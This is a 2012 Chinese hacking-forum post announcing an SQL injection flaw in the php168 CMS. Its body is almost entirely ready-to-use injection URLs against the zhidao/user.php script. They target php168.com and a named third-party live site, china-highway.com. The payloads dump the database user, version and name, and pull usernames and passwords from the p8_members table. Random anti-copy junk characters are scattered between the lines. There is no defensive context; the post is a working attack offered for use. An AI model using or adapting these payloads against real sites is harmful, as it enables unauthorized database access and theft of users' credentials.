找回密码
 立即注册
查看: 3446|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
5 q5 ~/ I4 H3 {; y& ~* N  @                                                         + w5 K1 \3 g( b5 Z, L: w; J
                                       
/ b* c$ o. R( O1 G; N2 J9 j9 n
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
. n/ f) E3 j6 E4 W% c. D1 Z3 \                                                     
8 {% I# {# U5 F: d8 Q/ m                                                                  
4 [7 o, O) p2 ?) d- X$ ?. h2 J                                                        2 B/ C' ~+ v+ p: R/ C
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--% M5 y0 k: L2 Q' w+ @! _6 R

6 a( ]. d- m+ H0 m8 u
2 a# c' K! V4 K0 v9 C: C. X: X
( r6 h. J2 e$ |                                                            ; m4 A0 g. s  X: q2 W3 g( C3 f

- w. ?" w( z2 k# X. r! `0 ^( _http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
1 H: T, o. t  X0 s: t2 w, v* {" ?. E: ^0 _- m1 H) v* s
7 x2 J' p3 y  @4 I+ ~! ]) B$ J6 B
, M& o+ U' `5 X% Z! `
                                                                    
2 \8 p( ]4 t7 ^' L6 a

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表